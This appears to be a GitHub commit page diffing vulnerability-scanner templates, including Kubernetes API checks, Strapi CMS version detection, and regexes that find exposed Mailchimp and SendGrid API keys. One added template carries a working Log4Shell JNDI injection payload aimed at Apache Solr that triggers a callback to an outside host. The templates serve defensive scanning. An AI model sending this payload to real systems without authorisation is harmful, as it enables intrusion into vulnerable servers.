-
Notifications
You must be signed in to change notification settings - Fork 240
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
1491b96
commit 55f3235
Showing
1,042 changed files
with
12,563 additions
and
27,467 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
20240712 | ||
20240713 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,22 @@ | ||
id: apache-solr-log4j-CVE-2021-44228 | ||
|
||
info: | ||
name: Log4j (CVE-2021-44228) Detect for Apache Solr | ||
author: toramanemre | ||
severity: Critical | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/solr/admin/collections?action=${jndi:ldap://{{interactsh-url}}}&wt=json" | ||
|
||
headers: | ||
Host: "{{Host}}" | ||
|
||
matchers: | ||
|
||
- type: word | ||
part: interactsh_protocol | ||
name: dns | ||
words: | ||
- "dns" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,5 +1,4 @@ | ||
id: kube-api-pods | ||
|
||
info: | ||
name: Kube API Pods | ||
author: sharath | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,4 +1,5 @@ | ||
id: kube-api-services | ||
|
||
info: | ||
name: Kube API Services | ||
author: sharath | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,15 +1,18 @@ | ||
id: mailchimp-access-key-value | ||
info: | ||
name: Mailchimp API Value | ||
author: puzzlepeaches | ||
severity: info | ||
tags: exposure,token,mailchimp | ||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}" | ||
extractors: | ||
- type: regex | ||
part: body | ||
regex: | ||
- "[0-9a-f]{32}-us[0-9]{1,2}" | ||
id: mailchimp-access-key-value | ||
|
||
info: | ||
name: Mailchimp API Value | ||
author: puzzlepeaches | ||
severity: info | ||
tags: exposure,token,mailchimp | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}" | ||
|
||
extractors: | ||
- type: regex | ||
part: body | ||
regex: | ||
- "[0-9a-f]{32}-us[0-9]{1,2}" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,13 +1,16 @@ | ||
id: sendgrid-api-key-file | ||
|
||
info: | ||
name: Sendgrid API Key | ||
author: gaurang | ||
severity: high | ||
tags: token,file,sendgrid | ||
tags: keys,file,token,sendgrid | ||
file: | ||
- extensions: | ||
- all | ||
|
||
extractors: | ||
- type: regex | ||
regex: | ||
- "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}" | ||
# digest: 4b0a00483046022100d3c8e8d194bf1de6ea48f9c0ed47cf49cc66a5f44195732b29617199ae5a360b022100d00c1fa924b6444959e020764b71559bc85f140c3c912d76e0fc6c35abe161d9:922c64590222798bb761d5b6d8e72950 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,22 +1,36 @@ | ||
id: strapi-cms-detect | ||
|
||
info: | ||
name: strapi CMS detect | ||
author: cyllective | ||
name: Strapi CMS detect | ||
author: cyllective,daffainfo,idealphase | ||
severity: info | ||
description: Detects strapi CMS | ||
tags: tech,strapi,cms | ||
description: Open source Node.js Headless CMS to easily build customisable APIs | ||
reference: | ||
- https://github.com/strapi/strapi | ||
tags: tech,strapi,cms | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/admin/auth/login" | ||
- "{{BaseURL}}/admin/init" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
condition: or | ||
words: | ||
- '<title>Strapi Admin</title>' | ||
- '"data"' | ||
- '"uuid"' | ||
- '"hasAdmin"' | ||
condition: and | ||
|
||
- type: status | ||
status: | ||
- 200 | ||
|
||
extractors: | ||
- type: regex | ||
part: body | ||
group: 1 | ||
regex: | ||
- '"strapiVersion":"([0-9.]+)"' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Oops, something went wrong.